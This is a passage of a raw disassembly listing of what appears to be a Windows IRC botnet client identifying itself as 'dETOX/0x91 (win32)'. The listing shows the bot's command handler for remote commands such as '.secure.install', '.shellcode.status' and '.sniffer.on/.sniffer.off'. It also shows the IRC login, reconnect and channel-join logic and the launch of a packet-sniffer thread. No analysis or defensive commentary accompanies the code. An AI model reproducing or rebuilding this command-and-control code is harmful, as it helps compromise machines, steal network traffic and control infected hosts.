loc_404EF2: ; CODE XREF: sub_404530+A0F�j
mov eax, [ebp+var_1C]
imul eax, 2Ch
cmp word ptr dword_402BE0[eax], bx
jz short loc_404F41
mov ecx, dword_402BE8[eax]
add [ebp+var_158], ecx
push off_402BDC[eax]
push ecx
push offset dword_4014E0
lea eax, [ebp+var_1D8]
push eax
call sub_40AB94
push edi
lea eax, [ebp+var_1D8]
push eax
lea eax, [ebp+var_154]
push eax
call sub_40AB8E
add esp, 1Ch
inc [ebp+var_1C]
jmp short loc_404EF2
; ---------------------------------------------------------------------------
loc_404F41: ; CODE XREF: sub_404530+9CF�j
push [ebp+var_158]
push offset dword_4014C8
lea eax, [ebp+var_1D8]
push eax
call sub_40AB94
push edi
lea eax, [ebp+var_1D8]
push eax
lea eax, [ebp+var_154]
push eax
call sub_40AB8E
add esp, 18h
lea eax, [ebp+var_154]
jmp loc_40460A
; ---------------------------------------------------------------------------
loc_404F7A: ; CODE XREF: sub_404530+999�j
push offset a_secure_instal ; ".secure.install"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_404FA2
call sub_40914C
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_40143C
call sub_405185
add esp, 0Ch
loc_404FA2: ; CODE XREF: sub_404530+A59�j
push offset a_shellcode_sta ; ".shellcode.status"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_405004
xor ecx, ecx
mov [ebp+var_1DC], ecx
and [ebp+var_1C], ecx
loc_404FBE: ; CODE XREF: sub_404530+AAD�j
mov eax, [ebp+var_1C]
imul eax, 2Ch
cmp word ptr dword_402BE0[eax], 0
jz short loc_404FDF
add ecx, dword_402BE8[eax]
mov [ebp+var_1DC], ecx
inc [ebp+var_1C]
jmp short loc_404FBE
; ---------------------------------------------------------------------------
loc_404FDF: ; CODE XREF: sub_404530+A9C�j
push ecx
movzx eax, word_40B24A
push eax
push dword_40B244
call sub_40715A
pop ecx
push eax
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_4013D4
jmp loc_4046AD
; ---------------------------------------------------------------------------
loc_405004: ; CODE XREF: sub_404530+A81�j
push offset a_sniffer_on ; ".sniffer.on"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_405055
mov edi, offset aSniffer ; "Sniffer"
push edi
call sub_40A64F
pop ecx
test eax, eax
push dword ptr [esi+4]
push dword ptr [esi]
jnz short loc_40504B
push offset unk_401394
call sub_405185
push edi
push 1
push 0
push offset sub_4098E2
call sub_40A45C
add esp, 1Ch
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_40504B: ; CODE XREF: sub_404530+AF8�j
push offset unk_401360
jmp loc_4047AA
; ---------------------------------------------------------------------------
loc_405055: ; CODE XREF: sub_404530+AE3�j
push offset a_sniffer_off ; ".sniffer.off"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_4050A3
mov edi, offset aSniffer ; "Sniffer"
push edi
call sub_40A64F
pop ecx
test eax, eax
push dword ptr [esi+4]
push dword ptr [esi]
jnz short loc_405085
push offset unk_401320
jmp loc_4047AA
; ---------------------------------------------------------------------------
loc_405085: ; CODE XREF: sub_404530+B49�j
push offset unk_4012F4
call sub_405185
push edi
call sub_40A64F
push eax
call sub_40A56C
add esp, 14h
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_4050A3: ; CODE XREF: sub_404530+B34�j
push offset a_thread_find ; ".thread.find"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_4050E5
cmp [ebp+var_98], eax
jz loc_40514A
push [ebp+var_98]
call sub_40A64F
pop ecx
mov [ebp+var_1E0], eax
test eax, eax
jnz short loc_405137
push dword ptr [esi+4]
push dword ptr [esi]
push offset unk_4012B8
jmp loc_4047AA
; ---------------------------------------------------------------------------
loc_4050E5: ; CODE XREF: sub_404530+B82�j
push offset dword_4012A8
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_4050FF
push esi
call sub_40A5D5
pop ecx
jmp short loc_40514A
; ---------------------------------------------------------------------------
loc_4050FF: ; CODE XREF: sub_404530+BC4�j
push offset dword_401298
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_40514A
cmp [ebp+var_98], eax
jz short loc_40514A
push [ebp+var_98]
call sub_40ABAC
push eax
call sub_40A56C
push [ebp+var_98]
call sub_40ABAC
add esp, 0Ch
loc_405137: ; CODE XREF: sub_404530+BA4�j
push eax
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_401270
loc_405142: ; CODE XREF: sub_404530+95�j
; sub_404530+E5�j ...
call sub_405185
loc_405147: ; CODE XREF: sub_404530+7B8�j
add esp, 10h
loc_40514A: ; CODE XREF: sub_404530+185�j
; sub_404530+1A9�j ...
wait
jmp short loc_405154
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_405154: ; CODE XREF: sub_404530+C1B�j
or [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_404530 endp
; =============== S U B R O U T I N E =======================================
sub_405167 proc near ; CODE XREF: sub_4052A5+1B�p
mov eax, dword_40372C
cmp eax, 5
jnz short loc_405175
xor eax, eax
jmp short loc_405176
; ---------------------------------------------------------------------------
loc_405175: ; CODE XREF: sub_405167+8�j
inc eax
loc_405176: ; CODE XREF: sub_405167+C�j
mov dword_40372C, eax
imul eax, 1Ch
mov eax, off_401B98[eax]
retn
sub_405167 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405185 proc near ; CODE XREF: sub_404530+B0�p
; sub_404530:loc_4046AD�p ...
var_101C = dword ptr -101Ch
var_1018 = byte ptr -1018h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4043D8
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 1004h
call sub_40ABE0
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
mov [ebp+var_4], ebx
push [ebp+arg_0]
call sub_40ABD2
pop ecx
cmp eax, 1000h
jnb loc_405281
lea eax, [ebp+arg_4]
mov [ebp+var_101C], eax
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1018]
push eax
call sub_40ABCC
add esp, 0Ch
mov [ebp+var_101C], ebx
mov esi, dword_4010FC
call esi ; dword_4010FC
mov ecx, eax
sub ecx, dword_40B27C
mov eax, 3E8h
cmp ecx, eax
ja short loc_405212
push eax
call dword_4010F4 ; Sleep
loc_405212: ; CODE XREF: sub_405185+84�j
call esi ; dword_4010FC
mov dword_40B27C, eax
cmp dword_40B280, 0FFFFFFFFh
jz short loc_405246
loc_405222: ; CODE XREF: sub_405185+FA�j
push ebx
lea eax, [ebp+var_1018]
push eax
call sub_40ABD2
pop ecx
push eax
lea eax, [ebp+var_1018]
push eax
push dword_40B280
call dword_401244
jmp short loc_405283
; ---------------------------------------------------------------------------
loc_405246: ; CODE XREF: sub_405185+9B�j
push 1388h
call dword_4010F4 ; Sleep
mov al, byte_40B240
cmp al, bl
jnz short loc_405279
cmp byte_40B274, bl
jnz short loc_405275
push dword_40B280
call sub_408616
pop ecx
call sub_4052A5
jmp short loc_405281
; ---------------------------------------------------------------------------
loc_405275: ; CODE XREF: sub_405185+DB�j
cmp al, bl
jz short loc_405281
loc_405279: ; CODE XREF: sub_405185+D3�j
cmp byte_40B274, bl
jnz short loc_405222
loc_405281: ; CODE XREF: sub_405185+42�j
; sub_405185+EE�j ...
xor eax, eax
loc_405283: ; CODE XREF: sub_405185+BF�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_405296
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_405296: ; CODE XREF: sub_405185+102�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_405185 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4052A5 proc near ; CODE XREF: sub_404530+33E�p
; sub_405185+E9�p ...
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
push ebp
mov ebp, esp
sub esp, 114h
mov al, byte_40B274
test al, al
jnz locret_4053DC
call sub_40969D
call sub_405167
push eax
call sub_409570
test eax, eax
pop ecx
jz loc_4053C3
mov eax, dword_40372C
imul eax, 1Ch
push off_401B98[eax]
call sub_409570
pop ecx
push eax
call dword_40124C
mov [ebp+var_C], eax
mov eax, dword_40372C
imul eax, 1Ch
mov [ebp+var_10], 2
mov ax, word_401B9C[eax]
push eax
call dword_401230
push 6
push 1
push 2
mov [ebp+var_E], ax
call dword_401234
lea ecx, [ebp+var_10]
push 10h
push ecx
push eax
mov dword_40B280, eax
call dword_401238
cmp eax, 0FFFFFFFFh
jz loc_4053C3
mov eax, dword_40372C
imul eax, 1Ch
push off_401BA0[eax]
call sub_40ABD2
test eax, eax
pop ecx
jz short loc_40536B
mov eax, dword_40372C
imul eax, 1Ch
push off_401BA0[eax]
push offset aPassS ; "PASS %s\r\n"
call sub_405185
pop ecx
pop ecx
loc_40536B: ; CODE XREF: sub_4052A5+AA�j
mov eax, dword_40B278
push esi
push eax
push offset aDetox0x91Win32 ; "dETOX/0x91 (win32)"
push eax
push eax
push eax
push offset aUserSSSSNickS ; "USER %s %s %s :%s\r\nNICK %s\r\n"
call sub_405185
mov esi, 104h
lea eax, [ebp+var_114]
push esi
push 0
push eax
call sub_40AC10
add esp, 24h
lea eax, [ebp+var_114]
push 0
push esi
push eax
push dword_40B280
call dword_40123C
cmp eax, 1
pop esi
jge short loc_4053D5
push dword_40B280
call dword_401240
loc_4053C3: ; CODE XREF: sub_4052A5+29�j
; sub_4052A5+8E�j
push 1388h
call dword_4010F4 ; Sleep
call sub_4052A5
leave
retn
; ---------------------------------------------------------------------------
loc_4053D5: ; CODE XREF: sub_4052A5+110�j
mov al, 1
mov byte_40B274, al
locret_4053DC: ; CODE XREF: sub_4052A5+10�j
leave
retn
sub_4052A5 endp
; =============== S U B R O U T I N E =======================================
sub_4053DE proc near ; CODE XREF: sub_405421+4D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
mov cl, [esi]
loc_4053E7: ; CODE XREF: sub_4053DE+1C�j
test cl, cl
jz short loc_4053FC
cmp cl, 0Dh
jz short loc_405400
cmp cl, 0Ah
jz short loc_405400
mov cl, [eax+esi+1]
inc eax
jmp short loc_4053E7
; ---------------------------------------------------------------------------
loc_4053FC: ; CODE XREF: sub_4053DE+B�j
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_405400: ; CODE XREF: sub_4053DE+10�j
; sub_4053DE+15�j
push edi
xor ecx, ecx
lea edi, [eax+esi]
loc_405406: ; CODE XREF: sub_4053DE+3A�j
mov dl, [edi+ecx]
cmp dl, 0Dh
jz short loc_405413
cmp dl, 0Ah
jnz short loc_40541A
loc_405413: ; CODE XREF: sub_4053DE+2E�j
and byte ptr [edi+ecx], 0
inc ecx
jmp short loc_405406
; ---------------------------------------------------------------------------
loc_40541A: ; CODE XREF: sub_4053DE+33�j
add eax, ecx
pop edi
add eax, esi
pop esi
retn
sub_4053DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405421 proc near ; CODE XREF: sub_40549A+A4�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4043E8
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_40545E
loc_40544E: ; CODE XREF: sub_405421+67�j
; MEW:00405498�j
mov edi, esi
cmp byte ptr [esi], 0
jnz short loc_40546D
push [ebp+arg_0]
call sub_40AC16
pop ecx
loc_40545E: ; CODE XREF: sub_405421+2B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40546D: ; CODE XREF: sub_405421+32�j
push esi
call sub_4053DE
pop ecx
mov esi, eax
mov [ebp+var_1C], esi
and [ebp+var_4], 0
push edi
call sub_4055A6
pop ecx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40544E
sub_405421 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
mov esi, [ebp-1Ch]
jmp short loc_40544E
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40549A proc near ; DATA XREF: sub_40933F+110�o
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4043F8
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
loc_4054C4: ; CODE XREF: sub_40549A+B1�j
xor ebx, ebx
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
push ebx
call sub_40AC22
pop ecx
mov edi, eax
mov [ebp+var_1C], edi
cmp edi, ebx
jz short loc_4054FA
loc_4054DC: ; CODE XREF: sub_40549A+BB�j
; sub_40549A+C8�j ...
add ebx, 400h
mov [ebp+var_24], ebx
lea eax, [ebx+1]
push eax
push edi
call sub_40AC1C
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_1C], edi
test edi, edi
jnz short loc_405511
loc_4054FA: ; CODE XREF: sub_40549A+40�j
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_405511: ; CODE XREF: sub_40549A+5E�j
lea esi, [edi+ebx]
push 0
push 400h
lea eax, [esi-400h]
push eax
push dword_40B280
call dword_40123C
mov [ebp+var_20], eax
test eax, eax
jle short loc_405550
and byte ptr [esi+eax-400h], 0
push edi
call sub_405421
push edi
call sub_40AC16
pop ecx
pop ecx
jmp loc_4054C4
; ---------------------------------------------------------------------------
loc_405550: ; CODE XREF: sub_40549A+99�j
jz short loc_405568
cmp eax, 0FFFFFFFFh
jnz short loc_4054DC
call dword_40122C
cmp eax, 2738h
jz loc_4054DC
loc_405568: ; CODE XREF: sub_40549A:loc_405550�j
push edi
call sub_40AC16
and byte_40B274, 0
and byte_40B240, 0
mov [esp+30h+var_30], 1388h
call dword_4010F4 ; Sleep
call sub_4052A5
jmp loc_4054DC
sub_40549A endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
push 0
call dword_4010EC ; ExitThread
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4055A6 proc near ; CODE XREF: sub_405421+5D�p
var_4CC = dword ptr -4CCh
var_4C8 = dword ptr -4C8h
var_4C4 = byte ptr -4C4h
var_4C0 = dword ptr -4C0h
var_4BC = dword ptr -4BCh
var_4B8 = byte ptr -4B8h
var_3B8 = byte ptr -3B8h
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_234 = byte ptr -234h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404408
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 4BCh
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov esi, [ebp+arg_0]
push esi
call sub_40ABD2
pop ecx
add eax, 4
and al, 0FCh
call sub_40ABE0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_2B8], ebx
push esi
call sub_40ABD2
pop ecx
add eax, 4
and al, 0FCh
call sub_40ABE0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_1C], eax
lea eax, [esi+1]
push eax
push ebx
call sub_40ABA0
push esi
push [ebp+var_1C]
call sub_40ABA0
mov edi, offset asc_401ADC ; " "
push edi
push [ebp+var_1C]
call sub_40ABB8
add esp, 18h
mov [ebp+var_2B4], eax
mov [ebp+var_130], 1
loc_40563F: ; CODE XREF: sub_4055A6+BF�j
cmp [ebp+var_130], 20h
jge short loc_405667
push edi
push 0
call sub_40ABB8
pop ecx
pop ecx
mov ecx, [ebp+var_130]
mov [ebp+ecx*4+var_2B4], eax
inc [ebp+var_130]
jmp short loc_40563F
; ---------------------------------------------------------------------------
loc_405667: ; CODE XREF: sub_4055A6+A0�j
push offset aPing ; "PING"
push [ebp+var_2B4]
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_405694
push [ebp+var_2B0]
push offset aPongS ; "PONG %s\r\n"
call sub_405185
pop ecx
loc_40568E: ; CODE XREF: sub_4055A6+305�j
pop ecx
jmp loc_405CD3
; ---------------------------------------------------------------------------
loc_405694: ; CODE XREF: sub_4055A6+D5�j
push offset aPrivmsg ; "PRIVMSG"
mov esi, [ebp+var_2B0]
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_4056C1
push offset dword_401DB8
push [ebp+var_2A8]
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jz short loc_4056D7
loc_4056C1: ; CODE XREF: sub_4055A6+103�j
push offset dword_401DAC
push [ebp+var_2A8]
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_4056F5
loc_4056D7: ; CODE XREF: sub_4055A6+119�j
push offset aDetox0x91Win32 ; "dETOX/0x91 (win32)"
lea eax, [ebp+var_3B8]
push eax
push offset dword_401D90
loc_4056E8: ; CODE XREF: sub_4055A6+1C0�j
; sub_4055A6+436�j
call sub_405185
add esp, 0Ch
jmp loc_405CD3
; ---------------------------------------------------------------------------
loc_4056F5: ; CODE XREF: sub_4055A6+12F�j
push offset aError ; "ERROR"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_40572A
loc_405706: ; CODE XREF: sub_4055A6+3A2�j
; sub_4055A6+3B7�j ...
and byte_40B274, 0
and byte_40B240, 0
push dword_40B280
call sub_408616
pop ecx
loc_405720: ; CODE XREF: sub_4055A6+38E�j
call sub_4052A5
jmp loc_405CD3
; ---------------------------------------------------------------------------
loc_40572A: ; CODE XREF: sub_4055A6+15E�j
push offset aKick ; "KICK"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_405768
push 1388h
call dword_4010F4 ; Sleep
and byte_40B240, 0
mov eax, dword_40372C
imul eax, 1Ch
push off_401BA8[eax]
push off_401BA4[eax]
push offset dword_40195C
jmp short loc_4056E8
; ---------------------------------------------------------------------------
loc_405768: ; CODE XREF: sub_4055A6+193�j
push offset a009 ; "009"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_4057E0
push 3E8h
call dword_4010F4 ; Sleep
push dword_40B278
push offset aModeSI ; "MODE %s +i\r\n"
call sub_405185
pop ecx
pop ecx
mov eax, dword_40372C
imul eax, 1Ch
push off_401BA8[eax]
push off_401BA4[eax]
push offset dword_40195C
call sub_405185
mov edi, offset aSniffer ; "Sniffer"
push edi
call sub_40A64F
add esp, 10h
test eax, eax
jnz loc_405CD3
push edi
push 1
push eax
push offset sub_4098E2
call sub_40A45C
loc_4057D8: ; CODE XREF: sub_4055A6+64A�j
add esp, 10h
jmp loc_405CD3
; ---------------------------------------------------------------------------
loc_4057E0: ; CODE XREF: sub_4055A6+1D1�j
push offset a001 ; "001"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jz loc_405BF5
push offset a422 ; "422"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jz loc_405BF5
push offset a366 ; "366"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_405841
mov eax, dword_40372C
imul eax, 1Ch
push off_401BA4[eax]
push [ebp+var_2A8]
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_405841
mov byte_40B240, 1
loc_405841: ; CODE XREF: sub_4055A6+273�j
; sub_4055A6+292�j
push offset a332 ; "332"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_4058B0
push offset asc_401D58 ; " :"
push ebx
call sub_40AB9A
pop ecx
pop ecx
sub eax, ebx
mov [ebp+var_134], eax
cmp eax, 1
jl loc_405CD3
and [ebp+var_4C4], 0
lea eax, [eax+ebx+2]
mov [ebp+var_4C0], eax
mov eax, dword_40372C
imul eax, 1Ch
mov eax, off_401BA4[eax]
mov [ebp+var_4C8], eax
mov [ebp+var_4CC], offset aPrivmsg ; "PRIVMSG"
lea eax, [ebp+var_4CC]
push eax
call sub_404530
jmp loc_40568E
; ---------------------------------------------------------------------------
loc_4058B0: ; CODE XREF: sub_4055A6+2AA�j
push offset a433 ; "433"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_4058F3
push 0Ah
push 4
call sub_40A818
push eax
call sub_40A77F
add esp, 0Ch
mov dword_40B278, eax
push eax
push offset aDetox0x91Win32 ; "dETOX/0x91 (win32)"
push eax
push eax
push eax
push offset aUserSSSSNickS ; "USER %s %s %s :%s\r\nNICK %s\r\n"
call sub_405185
add esp, 18h
jmp loc_405CD3
; ---------------------------------------------------------------------------
loc_4058F3: ; CODE XREF: sub_4055A6+319�j
push offset a432 ; "432"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_405939
push 0Ah
push 4
call sub_40A818
push eax
call sub_40A77F
mov dword_40B278, eax
and byte_40B274, 0
and byte_40B240, 0
push dword_40B280
call sub_408616
add esp, 10h
jmp loc_405720
; ---------------------------------------------------------------------------
loc_405939: ; CODE XREF: sub_4055A6+35C�j
push offset a471 ; "471"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jz loc_405706
push offset a473 ; "473"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jz loc_405706
push offset a474 ; "474"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jz loc_405706
push offset a475 ; "475"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jz loc_405706
push offset a480 ; "480"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jz loc_405706
push offset a513 ; "513"
push esi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_4059E1
cmp [ebp+var_298], eax
jz loc_405CD3
cmp [ebp+var_294], eax
jz loc_405CD3
push [ebp+var_294]
push [ebp+var_298]
push offset aSS_0 ; "%s %s\r\n"
jmp loc_4056E8
; ---------------------------------------------------------------------------
loc_4059E1: ; CODE XREF: sub_4055A6+40B�j
mov [ebp+var_2C], esi
mov eax, [ebp+var_2AC]
mov [ebp+var_28], eax
mov esi, 100h
push esi
push 0
lea eax, [ebp+var_3B8]
push eax
call sub_40AC10
push esi
push 0
lea eax, [ebp+var_12C]
push eax
call sub_40AC10
push esi
push 0
lea eax, [ebp+var_4B8]
push eax
call sub_40AC10
push esi
push 0
lea eax, [ebp+var_234]
push eax
call sub_40AC10
push offset asc_401D2C ; "!"
push ebx
call sub_40AB9A
add esp, 38h
mov esi, eax
sub esi, ebx
mov [ebp+var_134], esi
cmp esi, 1
jl loc_405CD3
push esi
push ebx
lea eax, [ebp+var_3B8]
push eax
call sub_40AC28
lea ebx, [ebx+esi+1]
mov [ebp+var_2B8], ebx
push offset a@ ; "@"
push ebx
call sub_40AB9A
add esp, 14h
mov esi, eax
sub esi, ebx
mov [ebp+var_134], esi
cmp esi, 1
jl loc_405CD3
push esi
push ebx
lea eax, [ebp+var_12C]
push eax
call sub_40AC28
lea ebx, [ebx+esi+1]
mov [ebp+var_2B8], ebx
push edi
push ebx
call sub_40AB9A
add esp, 14h
mov esi, eax
sub esi, ebx
mov [ebp+var_134], esi
cmp esi, 1
jl loc_405CD3
push esi
push ebx
lea eax, [ebp+var_4B8]
push eax
call sub_40AC28
lea esi, [ebx+esi+1]
mov [ebp+var_2B8], esi
push offset asc_401D24 ; ":"
push esi
call sub_40AB9A
add esp, 14h
sub eax, esi
mov [ebp+var_134], eax
push 1
pop ebx
cmp eax, ebx
jl loc_405CD3
lea esi, [esi+eax+1]
mov [ebp+var_2B8], esi
push esi
lea eax, [ebp+var_234]
push eax
call sub_40ABA0
push offset dword_401C40
lea eax, [ebp+var_4B8]
push eax
call sub_40A95F
add esp, 10h
test al, al
jz loc_405CD3
push edi
lea eax, [ebp+var_234]
push eax
call sub_40ABB8
pop ecx
pop ecx
mov [ebp+var_2B4], eax
mov [ebp+var_130], ebx
loc_405B44: ; CODE XREF: sub_4055A6+5C4�j
cmp [ebp+var_130], 2
jge short loc_405B6C
push edi
push 0
call sub_40ABB8
pop ecx
pop ecx
mov ecx, [ebp+var_130]
mov [ebp+ecx*4+var_2B4], eax
inc [ebp+var_130]
jmp short loc_405B44
; ---------------------------------------------------------------------------
loc_405B6C: ; CODE XREF: sub_4055A6+5A5�j
push dword_40B278
mov edi, [ebp+var_2B4]
push edi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jz short loc_405BAB
push offset asc_401D20 ; "*"
push edi
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jz short loc_405BAB
push edi
push dword_40B278
call sub_40A95F
pop ecx
pop ecx
test al, al
jz loc_405CD3
loc_405BAB: ; CODE XREF: sub_4055A6+5DC�j
; sub_4055A6+5ED�j
push dword_40B278
push [ebp+var_28]
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_405BC8
lea eax, [ebp+var_3B8]
mov [ebp+var_28], eax
loc_405BC8: ; CODE XREF: sub_4055A6+617�j
push edi
call sub_40ABD2
lea eax, [eax+esi+1]
mov [ebp+var_20], eax
and [ebp+var_24], 0
lea eax, [ebp+var_2C]
push eax
call sub_404530
push esi
call sub_40AC16
push [ebp+var_1C]
call sub_40AC16
jmp loc_4057D8
; ---------------------------------------------------------------------------
loc_405BF5: ; CODE XREF: sub_4055A6+249�j
; sub_4055A6+25E�j
cmp byte_40B240, 0
jnz short loc_405C31
push dword_40B278
push offset aModeSI ; "MODE %s +i\r\n"
call sub_405185
pop ecx
pop ecx
mov eax, dword_40372C
imul eax, 1Ch
push off_401BA8[eax]
push off_401BA4[eax]
push offset dword_40195C
call sub_405185
add esp, 0Ch
loc_405C31: ; CODE XREF: sub_4055A6+656�j
mov edi, offset aSniffer ; "Sniffer"
push edi
call sub_40A64F
pop ecx
test eax, eax
jnz short loc_405C52
push edi
push 1
push eax
push offset sub_4098E2
call sub_40A45C
add esp, 10h
loc_405C52: ; CODE XREF: sub_4055A6+699�j
push offset a@ ; "@"
push ebx
call sub_40AB9A
mov esi, eax
mov [ebp+var_4BC], esi
push dword_40B244
call sub_40715A
push eax
call sub_4095E2
add esp, 10h
test al, al
jz short loc_405C95
inc esi
push esi
push off_403730
call sub_40ABA0
pop ecx
pop ecx
push esi
call dword_40124C
jmp short loc_405CC5
; ---------------------------------------------------------------------------
loc_405C95: ; CODE XREF: sub_4055A6+6D5�j
lea edi, [esi+1]
push edi
mov esi, dword_40124C
call esi ; dword_40124C
cmp dword_40B244, eax
jz short loc_405CD3
push edi
call sub_4095E2
pop ecx
test al, al
jnz short loc_405CD3
push edi
push off_403730
call sub_40ABA0
pop ecx
pop ecx
push edi
call esi ; dword_40124C
loc_405CC5: ; CODE XREF: sub_4055A6+6ED�j
mov dword_40B244, eax
jmp short loc_405CD3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_405CD3: ; CODE XREF: sub_4055A6+E9�j
; sub_4055A6+14A�j ...
or [ebp+var_4], 0FFFFFFFFh
lea esp, [ebp-4D8h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4055A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_405CEC proc near ; DATA XREF: sub_40933F+121�o
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404418
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
mov [ebp+var_4], ebx
mov esi, offset aSniffer ; "Sniffer"
loc_405D1B: ; CODE XREF: sub_405CEC+B3�j
push offset aMapi ; "MAPI"
call sub_408953
pop ecx
test al, al
jnz short loc_405D31
call sub_408A88
jmp short loc_405D36
; ---------------------------------------------------------------------------
